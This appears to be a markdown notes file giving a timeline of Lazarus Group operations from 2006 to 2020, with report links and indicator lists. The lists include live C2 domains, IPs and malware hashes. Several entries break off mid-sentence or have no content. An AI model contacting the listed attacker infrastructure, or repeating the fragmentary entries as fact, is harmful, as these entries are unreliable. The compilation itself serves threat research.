Skip to content

Latest commit

 

History

History
3067 lines (2121 loc) · 186 KB

lazarus-malware-and-ttps.md

File metadata and controls

3067 lines (2121 loc) · 186 KB

Lazarus Malware, TTPs, and Evolution

2006 - 2013

INTERPOL’s Supernote Summit wherein they decide to change the bill.

  • Date:: 2006-07-26
  • Reported to be manufactured in the North Korea, the Supernote is a high-quality counterfeit of the 50-dollar and 100-dollar note, also known as a Superdollar. The notes are produced using similar processes and materials as genuine US currency.
  • First detected back in 1989, over $50M have been found as of 2006.
  • https://govinfo.gov/content/pkg/CHRG-109shrg28241/pdf/CHRG-109shrg28241.pdf

Operation Flame Malware

  • Date:: 2007-07-03

MYDOOM Malware and Dozer Malware - DDoS Attacks

  • Date:: 2009-07-04
  • A large scale DDoS attack on US and South Korean websites uses the MYDOOM and Dozer malware, which is suspected to have arrived in email messages. The malware places the text “Memory of Independence Day” in the Master Boot Record (MBR).

Operation Troy DDoS Attacks

Ten Days of Rain Attacks

Nnghyuo Bank DDoS Attacks

  • Date:: 2011-04
  • https://www.bbc.com/news/world-asia-pacific-13263888
  • Prosecutors said that a laptop used by a subcontractor "became in September 2010 a zombie PC operated by the North, which... later remotely staged the attack through the laptop".
  • One of the Internet Protocol (IP) addresses used to break into Nonghyup's system was the same as one used in March for a distributed denial-of-service (DDoS) attack that originated in North Korea, they added.
  • The software used in the incident was also similar to that employed in July 2009, when a number of South Korean government websites were attacked, the prosecutors said.
  • The hackers made the laptop a zombie computer on Sept. 4 in 2010 and managed it for seven months, obtaining inside information and operating the file deletion command remotely, according to the prosecution.

DarkSeoul Wiper Attacks

  • Date:: 2013-03-20
  • DarkSeoul: a wiper attack that targeted three South Korean broadcast companies, financial institutes, and an ISP
  • At the time, two other groups going by the personas ″NewRomanic Cyber Army Team and WhoIs Team″, took credit for that attack

2014

Sony Pictures Hack Wiper Attack Occurs

  • Date:: 2014-11-24
  • Sony Pictures Entertainment (“SPE”) and its comedic film “The Interview,” which depicted a fictional Kim Jong-Un, the Chairman of the Workers’ Party of Korea and the “supreme leader” of North Korea
  • Lazarus targeted individuals and entities associated with the production of “The Interview” and employees of SPE, sending them malware that the subjects used to gain unauthorized access to Sony's network
  • Once inside Sony's network, the subjects stole movies and other confidential information, and then effectively rendered thousands of computers inoperable
  • The same group of subjects also targeted individuals associated with the release of “The Interview,” among other victims.
  • Perpetrators identified themselves as the Guardians of Peace.
  • Large amounts of data were stolen and slowly leaked in the days following the attack.
  • U.S. investigators say the culprits spent at least two months copying critical files
  • The attack was conducted using malware. Server Message Block Worm Tool to conduct attacks
  • Components of the attack included a listening implant, backdoor, proxy tool, destructive hard drive tool, and destructive target cleaning tool
  • The components clearly suggest an intent to gain repeated entry, extract information, and be destructive, as well as remove evidence of the attack
  • November 24, 2014 - malware previously installed rendered many Sony employees' computers inoperable by the software, with the warning by a group calling themselves the Guardians of Peace, along with a portion of the confidential data taken during the hack.
  • Several Sony-related Twitter accounts were also taken over
  • Park was a North Korean hacker that worked for the country's Reconnaissance General Bureau, the equivalent of the
  • The US DOJ also asserted that Park was partially responsible for arranging WannaCry, having developed part of the ransomware software
  • https://en.wikipedia.org/wiki/Sony_Pictures_hack
  • https://fbi.gov/news/pressrel/press-releases/update-on-sony-investigation

Operation Red Dot against South Korean Govt/Defence Co's

  • Date:: 2014-2015:
  • Variants of the malware used in the Sony Pictures hack were found in attacks which targeted the websites of North Korean research and governmental organizations, and the South Korean defence industry.
  • AhnLab refers to these attacks – which occurred from 2014 to 2015 – as Operation Red Dot. The variants in this operation share similar code and names, such as AdobeArm.exe and msnconf.exe.
  • The main infection methods are: executable files disguised as document files (HWP, PDF), disguised installers, and exploits of Hangul Word Processor (HWP) file vulnerabilities.
  • The document files, which are listed in Table 3, are decoys disguised as legitimate documents, such as address books, deposit slips and invitations to lure victims into opening them.
  • https://virusbulletin.com/virusbulletin/2018/11/vb2018-paper-hacking-sony-pictures/

2015

Banco del Austro in Ecuador SWIFT Bank Heist - $12M

KIMSUKY - South Korea blames North Korea for December hack on nuclear operator

Bangledesh Bank Employees spear-phished

  • Date:: 2015-03-30
  • By March the hackers had a backdoor to teh bank's electronic communication system allowing them to send messages to one another in a way that mimicked the bank’s encrypted-communication protocols, and did not alert security to their presence.

SWIFT Heists

  • 2015-2019
  • Attempts from 2015 through 2019 to steal more than $1.2 billion from banks in Vietnam, Bangladesh, Taiwan, Mexico, Malta, and Africa by hacking the banks’ computer networks and sending fraudulent SWIFT messages.

Sony Pictures Hack - Intrusion into Mammoth Screen, producer of a fictional series involving a British nuclear scientist taken prisoner in DPRK

2016

Sony Pictures Hack Report Released: Operation Blockbuster

Bangledesh Bank SWIFT Heist Initiated - $81M

Engaged in computer intrusions and cyber-heists at many financial services victims in the United States, and in other countries in Europe, Asia, Africa, North America, and South America in 2015, 2016, 2017, and 2018, with attempted losses well over $1 billion.

  • Date:: 2015-2018

BAE Systems Threat Research Blog: Cyber Heist Attribution

FASTCash - $16M dollars was withdrawn from roughly 1700 7-Eleven A.T.M.s across Japan using data stolen from South Africa’s Standard Bank

  • Date:: 2016-05-14

Tien Phong Bank in Vietnam SWIFT Heist - $1M

SWIFT Heists Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank

SWIFT Heists Evidence of Stronger Ties Between North Korea and SWIFT Banking Attacks

Operation Daybreak

Multiple spear-phishing campaigns targetting employees of US defense contractors, energy companies, aerospace companies, technology companies, the U.S.Department of State, and the U.S. Department of Defense

Stole more than 200GB of South Korean Army data

  • Date:: 2016
  • which included documents known as Operational Plan 5015—a detailed analysis of how a war with the country’s northern neighbor might proceed, and, notably, a plot to “decapitate” North Korea by assassinating Kim Jong Un. The breach was so egregious that Kim Tae-woo, a former president of the Korea Institute for National Unification, a think tank in Seoul, told the Financial Times, “Part of my mind hopes the South Korean military intentionally leaked the classified documents to the North with the intention of having a second strategy.”

2017

Lazarus Under The Hood

  • Date:: 2017-04-03
  • Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011.
  • All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.
  • We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers.
  • Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.
  • Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. “Keep morphing!” seems to be their internal motto.
  • Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.
  • https://securelist.com/lazarus-under-the-hood/77908/
  • https://csoonline.com/article/560979/kaspersky-lab-reveals-direct-link-between-banking-heist-hackers-and-north-korea.html

WannaCry

Lazarus Arisen

  • Date:: 2017-05-30
  • https://group-ib.com/blog/lazarus/
  • 210.52.109.22 - China Netcom, 210.52.109.0/24 is assigned to North Korea
  • 175.45.178.222 - Natinal Defence Commission
  • 175.45.178.19 - Ghost RAT
  • 175.45.178.97 - Ghost RAT

Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures were reportedly employed during this compromise were different than those we have observed in following intrusion attempts and as of yet there are no clear indications of North Korean involvement).

  • Date:: 2017-04-22

The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.

  • Date:: 2017-04-26

Spearphishing against South Korean Exchange #1 begins.

  • Date:: 2017-05-01

South Korean Exchange #2 compromised via spearphish.

  • Date:: 2017-05-30

More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.

  • Date:: 2017-06-01

CISA: Report on HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

  • Date:: 2017-06-13
  • This Joint Technical Alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. government partners, DHS and FBI identified Internet Protocol addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s DDoS botnet infrastructure.
  • https://us-cert.gov/ncas/alerts/TA17-164A

South Korean Exchange #3 targeted via spear phishing to personal account.

  • Date:: 2017-07-01

Why Is North Korea So Interested in Bitcoin?

Unit42 has discovered ongoing attack targeting individuals involved with US defense contracts links back to perportrators of the Sony Pictures Hack.

CISA's analysis of DeltaCharlie Attack Malware

  • Date:: 2017-08-23
  • STIX file for MAR 10132963. This MAR examines the functionality of the DeltaCharlie malware variant to manage North Korea’s distributed denial-of-service (DDOS) botnet infrastructure (refer to TA17-164A). DHS distributed this MAR to enable network defense and reduce exposure to any North Korean government malicious cyber activity.

The World Once Laughed at North Korean Cyberpower. No More.

CISA's analysis of FALLCHILL and Volgmer

  • Date:: 2017-11-14
  • CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
  • CISA Alert TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
  • These Joint Technical Alerts provide information and IOCs on malware variants used by the North Korean government to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI distributed these alerts to enable network defense and reduce exposure to any North Korean government malicious cyber activity.

North Korea suspected in latest bitcoin heist, bankrupting Youbit exchange

CISA's analysis of North Korean Trojan: BANKSHOT

  • Date:: 2017-12-21
  • STIX file for MAR 10135536
  • DHS and FBI identified a Trojan malware variant—referred to as BANKSHOT—used by the North Korean government. This MAR analyzes three malicious executable files.
  • Two files are 32-bit Windows executables that function as Proxy servers and implement a Fake TLS method.
  • The third file is an Executable Linkable Format file designed to run on Android platforms as a fully functioning Remote Access Trojan.

2018

TrendMicro's KillDisk Variant Hits Latin American Financial Groups

Korea In The Crosshairs

North Korea Bitten by Bitcoin Bug: Financially motivated campaigns reveal new dimension of the Lazarus Group

  • Date:: 2018-01-29
  • https://proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf
  • PowerRatankba, Gh0st RAT, RatankbaPOS
  • btc-gold.us
  • PowerRatankba C2:: 51.255.219.82
  • PowerRatankba C2:: 144.217.51.246
  • PowerRatankba C2:: 158.69.57.135
  • PowerRatankba C2:: 198.100.157.239
  • PowerRatankba C2:: 201.139.226.67
  • PowerRatankba C2:: 92.222.106.229
  • PowerRatankba C2:: apps.got-game.org
  • PowerRatankba C2:: trade.publicvm.com
  • PowerRatankba C2:: www.businesshop.net
  • PowerRatankba C2:: vietcasino.linkpc.net
  • C2:: coinbases.org
  • C2:: africawebcast.com
  • C2:: bitforex.linkpc.net
  • C2:: macintosh.linkpc.net
  • C2:: coinbroker.linkpc.net
  • C2:: moneymaker.publicvm.com

North Korea stole huge amount of virtual currency: South Korea spy agency

CISA's analysis of North Korean Trojan: HARDRAIN

  • Date:: 2018-02-13
  • AR 10135536-F: North Korean Trojan: HARDRAIN
  • STIX file for MAR 10135536-F
  • DHS and FBI identified a Trojan malware variant—referred to as HARDRAIN—used by the North Korean government.

Reaper - The Overlooked North Korean Actor from FireEye

CISA's analysis of North Korean Trojan: SHARPKNOT

  • Date:: 2018-03-28
  • MAR 10135536.11: North Korean Trojan: SHARPKNOT
  • STIX file for MAR 10135536.11
  • DHS and FBI identified a Trojan malware variant—referred to as SHARPKNOT—used by the North Korean government. SHARPKNOT is a 32-bit Windows executable file. When executed from the command line, the malware overwrites the Master Boot Record and deletes files on the local system, any mapped network shares, and physically connected storage devices.

Lazarus KillDisks Central American casino

  • Date:: 2018-04-03
  • https://welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/
  • Our analysis shows that the cybercriminals behind the attack against an online casino in Central America, and several other targets in late-2017, were most likely the infamous Lazarus hacking group. In all of these incidents the attackers utilized similar toolsets, including KillDisk; the disk-wiping tool that was executed on compromised machines.
  • Some of the past attacks attributed to the Lazarus Group attracted the interest of security researchers who relied on Novetta et al’s white papers with hundreds of pages describing the tools used in the attacks – the Polish and Mexican banks; the WannaCryptor outbreak; phishing campaigns against US defense contractors, etc – and provides grounds for the attribution of these attacks to the Lazarus Group.
  • Our analysis of these two Win32/KillDisk.NBO variants revealed that they share many code similarities. Further, they are almost identical to the KillDisk variant used against financial organizations in Latin America, as described by Trend Micro.
  • One of the variants was protected using the commercial PE protector VMProtect in its 3rd generation, which made unpacking it trickier. The attackers most likely did not buy a VMProtect license but have rather used leaked or pirated copies available on the Internet. Using protectors is common for the Lazarus group: during the Polish and Mexican attacks in February 2017, they made use of Enigma Protector and some of the Operation Blockbuster samples, reported by Palo Alto Networks, used an older version of VMProtect.
  • This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else). The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.
  • Utilizing KillDisk in the attack scenario most likely served one of two purposes: the attackers covering their tracks after an espionage operation, or it was used directly for extortion or cyber-sabotage. In any case, the fact that ESET products detected the malware on over 100 endpoints and servers in the organization signifies a large-scale effort of the attackers.

SWIFT is aware of a malware that aims to reduce financial institutions’ abilities to evidence fraudulent transactions on their local systems. Contrary to reports that suggest otherwise, this malware has no impact on SWIFT’s network or core messaging services.

CISA's analysis of HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm

  • Date:: 2018-05-29
  • CISA Alert TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
  • MAR 10135536-3: HIDDEN COBRA RAT/Worm
  • This Joint Technical Alert and MAR authored by DHS and FBI provides information, including IOCs associated with two families of malware used by the North Korean government: A remote access tool, commonly known as Joanap; and Server Message Block worm, commonly known as Brambul.

NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea

Banco de Chile Wiper Attack Just a Cover for $10M SWIFT Heist

CISA's analysis of North Korean Trojan: TYPEFRAME

  • Date:: 2018-06-14
  • AR 10135536-12
  • DHS and FBI identified a Trojan malware variant—referred to as TYPEFRAME—used by the North Korean government. DHS and FBI distributed this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity. This malware report contains an analysis of multiple malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications macros.

New Andariel Reconnaissance Tactics Uncovered

  • Date:: 2018-07-16
  • https://trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html
  • Andariel has been quite active these past few months. According to South Korean security researchers IssueMakersLab, the group used an ActiveX zero-day exploit for watering hole attacks on South Korean websites last May—they called this “Operation GoldenAxe”. But more recently on June 21, we noticed that Andariel injected their script into four other compromised South Korean websites for reconnaissance purposes.

CISA's analysis of North Korean Trojan: KEYMARBLE

  • Date:: 2018-08-09
  • AR 10135536-17
  • DHS and FBI identified a Trojan malware variant—referred to as KEYMARBLE—used by the North Korean government. KEYMARBLE is a RAT capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screen shots, and exfiltrating data.

DOJ’s Criminal Complaint of a North Korean Regime-Backed Programmer Jin Hyok Park

The most destructive cyber threat right now

FireEye: Report on APT38

NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT

CISA's analysis of HIDDEN COBRA FASTCash Campaign

Mandiant: APT38 - Details on New North Korean Regime-Backed Threat Group

Recorded Future: Lazarus Group Shifting Patterns in Internet Use Reveal Adaptable and Innovative North Korean Ruling Elite

Cryptocurrency businesses targeted by Lazarus via custom PowerShell Scripts

KIMSUKY - Stolen Pencil Campaign

Top secret report: North Korea keeps busting sanctions, evading U.S.-led sea patrols

Group-IB: 2018 Crime Report

According to the Treasury, NK affiliated hackers “likely” stole ~$571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.

  • 2018-09: Indonesian Crypto Company Theft - $24.9M
  • 2018-06: Bithumb2 CEX Hack - Lazarus - $30M
  • 2017-12: YouBit CEX Hack (previously known as Yapizon)
  • 2017-04: Yapizon CEX Hack - 3831 BTC

Multiple malicious cryptocurrency applications which would provide the North Korean hackers a backdoor into the victims’ computers.

  • Date:: March 2018 through at least September 2020
  • Celas Trade Pro WorldBit-Bot iCryptoFx Union Crypto Trader Kupay Wallet CoinGo Trade Dorusio CryptoNeuro Trader and Ants2Whale
  • which would provide the North Korean hackers a backdoor into the victims’ computers.

FASTCash grabs $6.1 million from BankIslami Pakistan Limited

Operation AppleJeus research highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses

  • Date:: 2018
  • New ability to target macOS.
  • Infected with malware after installing a legitimate-looking trading application called Celas Trade Pro from Celas Limited showed no signs of malicious behaviour and looked genuine. Malware delivered via update files in app. User installed this program via a download link delivered over email.
  • For macOS users, Celas LLC also provided a native version of its trading app. A hidden “autoupdater” module is installed in the background to start immediately after installation, and after each system reboot.
  • https://securelist.com/operation-applejeus/87553/

2019

Two Hundred North Korean hacker organizations dispatched overseas, each team sending up to $1 million to North Korea

KIMSUKY - Operation Kabar Cobra

KIMSUKY - Operation Smoke Screen

North Korea's Next Weapon of Choice: Cyber

ScarCruft continues to evolve, introduces Bluetooth harvester

JPCERT: Spear Phishing against Cryptocurrency Businesses

  • Date:: 2019-07-09
  • https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html
  • The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
  • CryptoCore
  • C2:: service.amzonnews.club
  • C2:: 75.133.9.84
  • C2:: update.gdrives.top
  • C2:: googledrive.network
  • C2:: drverify.dns-cloud.net
  • C2:: docs.googlefiledrive.com
  • C2:: europasec.dnsabr.com
  • C2:: eu.euprotect.net
  • C2:: 092jb_378v3_1.googldocs.org
  • C2:: gbackup.gogleshare.xyz
  • C2:: drive.gogleshare.xyz
  • C2:: down.financialmarketing.live
  • C2:: drivegoogle.publicvm.com
  • C2:: googledrive.publicvm.com
  • C2:: mskpupdate.publicvm.com
  • C2:: googledrive.email
  • C2:: iellsfileshare.sharedrivegght.xyz
  • C2:: download.showprice.xyz
  • C2:: downs.showprice.xyz
  • C2:: mdown.showprice.xyz
  • C2:: start.showprice.xyz
  • C2:: u13580130.ct.sendgrid.net

CISA's analysis of North Korean Malware ELECTRICFISH and BADCALL

  • Date:: 2019-09-09
  • MAR 10135536-21: North Korean Proxy Malware: ELECTRICFISH Note: this version of the ELECTRICFISH MAR updates the May 9, 2019 version.
  • MAR 10135536-10: North Korean Trojan: BADCALL Note: this version of the BADCALL MAR updates the February 6, 2018 version: and STIX file.
  • CISA, FBI, and DoD identified multiple malware variants used by the North Korean government.
  • ELECTRICFISH implements a custom protocol that allows traffic to be tunneled between a source and a destination Internet Protocol (IP) address.
  • BADCALL malware is an executable that functions as a proxy server and implements a Fake TLS method.

Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups

Indian Nuclear Power Plant Attack

  • Date:: 2019-10-29
  • https://greatgameindia.com/kudankulam-nuclear-power-plant-hit-by-cyberattack/
  • Kaspersky Global Research and Analysis Team have discovered a previously unknown spy tool, which had been spotted in Indian financial institutions and research centers. Called Dtrack, this spyware reportedly was created by the Lazarus group and is being used to upload and download files to victims’ systems, record key strokes and conduct other actions typical of a malicious remote administration tool (RAT).
  • In 2018, Kaspersky researchers discovered ATMDtrack – malware created to infiltrate Indian ATMs and steal customer card data. Following further investigation using the Kaspersky Attribution Engine and other tools, the researchers found more than 180 new malware samples that had code sequence similarities with the ATMDtrack, but at the same time were not aimed at ATMs. Instead, its list of functions defined it as spy tools, now known as Dtrack.
  • Moreover, not only did the two strains share similarities with each other, but also with the 2013 DarkSeoul campaign, which was attributed to Lazarus – an infamous advanced persistence threat actor responsible for multiple cyberespionage and cyber sabotage operations.

Indian Nuclear Power Plant Attack We have long known and continuously monitored North Korea is attacking India

New Lazarus Malware: macOS Threat Served from Cryptocurrency Trading Platform

2020

Kaspersky: Operation AppleJeus Sequel

  • Date:: 2020-01-08
  • https://securelist.com/operation-applejeus-sequel/95596/
  • macOS malware
  • c2ffbf7f2f98c73b98198b4937119a18 MacInstaller.dmg
  • 8b4c532f10603a8e199aa4281384764e BitcoinTrader.pkg
  • cb56955b70c87767dee81e23503086c3 WbBot.pkg
  • be37637d8f6c1fbe7f3ffc702afdfe1d MarkMakingBot.dmg
  • bb66ab2db0bad88ac6b829085164cbbb BitcoinTrader.pkg
  • 6588d262529dc372c400bef8478c2eec UnionCryptoTrader.dmg
  • 55ec67fa6572e65eae822c0b90dc8216 UnionCryptoTrader.pkg
  • 39cdf04be2ed479e0b4489ff37f95bbe JMTTrader_Mac.dmg
  • e35b15b2c8bb9eda8bc4021accf7038d JMTTrader.pkg
  • a9e960948fdac81579d3b752e49aceda WFCUpdater.exe
  • 24B3614D5C5E53E40B42B4E057001770 UnionCryptoTraderSetup.exe
  • 629B9DE3E4B84B4A0AA605A3E9471B31 UnionCryptoUpdater.exe
  • E1953FA319CC11C2F003AD0542BCA822 AdobeUpdator.exe, AdobeARM.exe
  • f221349437f2f6707ecb2a75c3f39145 rasext.dll
  • 055829E7600DBDAE9F381F83F8E4FF36 UnionCryptoTraderSetup.exe
  • F051A18F79736799AC66F4EF7B28594B Unistore.exe
  • wb-bot.org
  • jmttrading.org
  • cyptian.com
  • beastgoc.com
  • private-kurier.com
  • wb-invest.net
  • wfcwallet.com
  • chainfun365.com
  • buckfast-zucht.de
  • invesuccess.com
  • aeroplans.info
  • mydealoman.com
  • unioncrypto.vip
  • 104.168.167.16
  • 23.254.217.53
  • 185.243.115.17
  • 104.168.218.42
  • 95.213.232.170
  • 108.174.195.134
  • 185.228.83.32
  • 172.81.135.194
  • wb-bot[.]org/certpkg.php
  • 95.213.232[.]170/ProbActive/index.do
  • beastgoc[.]com/grepmonux.php
  • unioncrypto[.]vip/update

CISA's analysis of North Korean Trojans BISTROMATH, SLICKSHOES, CROWDEDFLOUNDER, HOTCROISSANT, ARTFULPIE, BUFFETLINE, HOPLIGHT

  • Date:: 2020-02-14
  • Note: this version of HOPLIGHT MAR updates the October 31, 2019 version, which updated April 10, 2019 version.
  • BISTROMATH looks at multiple versions of a full-featured Remote Access Trojan implant executable and multiple versions of the CAgent11 GUI implant controller/builder.
  • SLICKSHOES is a Themida-packed dropper that decodes and drops a Themida-packed beaconing implant.
  • CROWDEDFLOUNDER looks at Themida packed Windows executable.
  • HOTCROSSIANT is a full-featured beaconing implant.
  • ARTFULPIE is an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL.
  • BUFFETLINE is a full-featured beaconing implant.
  • HOPLIGHT looks at multiple malicious executable files. Some of which are proxy applications that mask traffic between the malware and the remote operators.

Treasury Sanctions Individuals Laundering Cryptocurrency for Lazarus Group

How an elaborate North Korean crypto hacking heist fell apart

UNC2891 Have Your Cake and Eat it Too? An Overview of UNC2891

  • Date:: 2020-03-16
  • https://mandiant.com/resources/unc2891-overview
  • UNC2891 intrusions appear to be financially motivated and in some cases spanned several years through which the actor had remained largely undetected.
  • Mandiant discovered a previously unknown rootkit for Oracle Solaris systems that UNC2891 used to remain hidden in victim networks, we have named this CAKETAP.
  • Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems.

U.S. Government Advisory: Guidance on the North Korean Cyber Threat

  • Date:: 2020-04-15
  • The U.S. Departments of State, Treasury, and Homeland Security and FBI issued this Advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The Advisory highlights the cyber threat posed by North Korea and provides recommended steps to mitigate the threat.

CISA's Guidance on the North Korean Cyber Threat

CISA Alert on TraitorTrader

OXT's The North Korean Connection

CISA's analysis of North Korean Trojans: COPPERHEDGE, TAINTEDSCRIBE, PEBBLEDASH

  • Date:: 2020-05-12
  • MAR 1028834-1.v1: North Korean Remote Access Tool: COPPERHEDGE
  • MAR 1028834-2.v1: North Korean Trojan: TAINTEDSCRIBE
  • MAR 1028834-3.v1: North Korean Trojan: PEBBLEDASH
  • CISA, FBI, and DoD identified three malware variants used by the North Korean government.
  • COPPERHEDGE is Manuscrypt family of malware is used by APT cyber actors in the targeting of cryptocurrency exchanges and related entities. Manuscrypt is a
  • TAINTEDSCRIBE and PEBBLEDASH are full-featured beaconing implants.

U.S. Government Advisory: Top 10 Routinely Exploited Vulnerabilities

  • Date:: 2020-05-12
  • CISA, FBI, and the broader U.S. Government authored a Joint Alert with details on vulnerabilities routinely exploited by foreign cyber actors, including North Korean cyber actors.

USA Chargees 28 North Koreans and 5 Chinese citizens with laundering more than $2.5 billion in assets to help fund North Korea’s nuclear weapons

ClearSky: CryptoCore - A Threat Actor Targeting Cryptocurrency Exchanges

  • Date:: 2020-06-01
  • https://clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf
  • CryptoCore, Dangerous Password, Leery Turtle
  • The group often uses Google Drive as the storage for its files, specifically the bait
  • Relatively heavy use of VBS files both as downloaders and as backdoors. What appears to be the main backdoor of the group is also a VBS file (tracked by Proofpoint Emerging Threats as CageyChameleon), rather than an executable or an in-memory payload.
  • LNK shortcuts as downloaders – we have seen the attackers hide LNK shortcuts behind icons and titles of other file types, mostly text files. Sometimes it could be a password file needed to open the main document, sometimes it could be the main document that is actually a shortcut, but LNK files are a staple for this group. These files are used to connect to the command and control (C2) server and download next-stage files.
  • .xyz TLD via NameCheap
  • The VBS created in %TEMP% acts as a downloader for another VBS. That VBS collects: Username, Host name, OS version, install date and run time, Time zone, CPU name, Execution path of the VBS in %TEMP%, Network adapter information, List of running processes. The information is sent to the C2 server every minute, and it expects additional VBS as a response.

VHD ransomware, Hakuna MATA

  • Date:: 2020-07-01
  • initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server.
  • https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

North Korean hackers are skimming US and European shoppers

U.S. seeks forfeiture of $2,372,793 for violations of sanctions against the DPRK

  • Date:: 2020-07-23
  • According to the complaint, the four companies laundered U.S. dollars on behalf of sanctioned North Korean banks and helped those banks to illegally access the U.S. financial market.
  • The complaint lists one source of the laundered funds as a DPRK entitity involved in the banned sales of North Korean coal. The laundered funds were used to purchase Russian pretroleum products and nuclear and missile components for the DPRK and to aid multiple cover branches of the DPRK’s Foreign Trade bank, which the U.S. Treasury Department had sanctioned for “facilitating transactions on behalf of actors linked to the DPRK’s proliferation network”.
  • https://justice.gov/opa/pr/united-states-files-complaint-forfeit-more-237-million-companies-accused-laundering-funds

Yang Ban Corporation Pleads Guilty to Money Laundering

  • Date:: 2020-08-31
  • From at least February 2017 to May 2018 and beyond, Yang Ban deceived banks in the U.S. into processing transactions for North Korean customers of Yang Ban.
  • It used front companies and created false sets of invoices and shipping records to conceal that the ultimate destination of shipments were customers in the DPRK. These practices helped Yang Ban circumvent “banks’ sanction and anti-money laundering filters” thus “duping U.S. correspondent banks into processing U.S. dollar transactions that they would not otherwise have authorized.”
  • Yang Ban specifically admitted to conspiring with SINSMS (a company subsequently designated by U.S. sanctions) and others, “to conceal the North Korean nexus” by falsifying shipping records and by other means.
  • The company will pay a financial penalty totaling $673,714 (USD) and has “agreed to implement rigorous internal controls and to cooperate fully with the Justice Department, including by reporting any criminal conduct by an employee”.
  • https://justice.gov/opa/pr/company-pleads-guilty-money-laundering-violation-part-scheme-circumvent-north-korean
  • https://nknews.org/2020/09/company-pleads-guilty-to-helping-north-korea-illegally-use-us-banking-system

Operation Dream Job - Espionage Campaign Targetting Govt and Defense Co's

  • Date:: 2020-08-13
  • Widespread North Korean Espionage Campaign
  • It succeeded in infecting several dozens of companies and organizations in Israel and globally
  • Main targets: defense, governmental companies, and specific employees of those companies
  • We assess this to be this year’s main offensive campaign by the Lazarus group
  • The infection and infiltration of target systems had been carried out through a widespread and sophisticated social engineering campaign, which included: reconnaissance, creation of fictitious LinkedIn profiles, sending emails to the targets’ personal addresses, and conducting a continuous dialogue with the target – directly on the phone, and over WhatsApp
  • Upon infection, the attackers collected intelligence regarding the company’s activity, and also its financial affairs, probably in order to try and steal some money from it
  • The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country.
  • https://clearskysec.com/operation-dream-job/
  • https://clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

CISA's analysis of North Korean Remote Access Trojan: BLINDINGCAN

  • Date:: 2020-08-19
  • CISA and FBI have identified a malware variant—referred to as BLINDINGCAN—used by North Korean actors. FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. A threat group with a nexus to North Korea targeted government contractors early this year to gather intelligence surrounding key military and energy technologies.

DPRK-aligned threat actor targeting cryptocurrency vertical with global hacking campaign

Lazarus Group Campaign Targeting the Cryptocurrency Vertical

CISA: Report FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks

  • Date:: 2020-08-26
  • MAR 10301706-1.v1: North Korean Remote Access Tool: ECCENTRICBANDWAGON
  • MAR 10301706-2.v1: North Korean Remote Access Tool: VIVACIOUSGIFT
  • MAR 10257062-1.v2: North Korean Remote Access Tool: FASTCASH for Windows
